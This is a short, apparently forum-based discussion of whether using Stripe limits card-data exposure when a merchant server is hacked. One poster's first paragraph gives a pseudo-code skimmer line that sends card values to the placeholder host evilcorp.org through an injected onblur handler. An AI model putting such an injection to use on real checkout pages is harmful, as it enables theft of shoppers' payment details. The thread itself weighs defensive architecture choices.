Well the server holds the checkout page. And the server is hacked. So if attacker just add onblur = getjson(evilcorp.org?cc=value) to the checkout page attacker got the cc details. No?
ONE:
You don't use stripe and save all you customer info locally and procces it some other way
TWO:
You use stripe and never store any CC info on your server.
THEN:
Your server is hacked. In ONE, you lose customer CC info because it is stored on your server. In TWO, you do NOT. Sure they can redirect you to a fake payment page, but that will get noticed quickly and damage will be limited to "phished" users not your entire user base.
For CC details to be stored the attacker needs to modify files though. Other payment gateways just process CC details locally, it is not stored. So either the attacker modifies files to store CC details - or the attacker gets access to log files (but CC details do not belong there either off course).
